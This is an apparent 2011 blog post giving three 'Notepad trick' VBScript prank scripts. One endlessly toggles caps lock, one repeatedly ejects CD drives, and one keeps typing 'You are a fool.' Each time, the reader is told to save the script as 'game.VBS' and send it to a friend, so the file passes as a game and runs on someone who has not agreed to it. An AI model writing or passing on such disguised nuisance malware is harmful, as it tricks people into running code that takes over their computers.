Saturday, 24 September 2011

Notepad trick 3


Open notpad and then
type


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Then save as “game.VBS” and send to your friend
And see

This is harmless notepad virus
It toggle your friend’s caps lock button simultaneously.

Notepad trick 2


Open notepad  and then
 type



Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop



Then save as “game.VBS” and send to your friend
And see

This is harmless notepad virus
It continually pop out your friend’s cd or dvd drive.

Friday, 23 September 2011

Notepad trick 1

Make harmless notepad virus

open notepad

then type this



Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop



and save as game.VBS and done.
then  send this file to your friend and see


this is the harmless you are fool virus


for turn off the virus restart computer.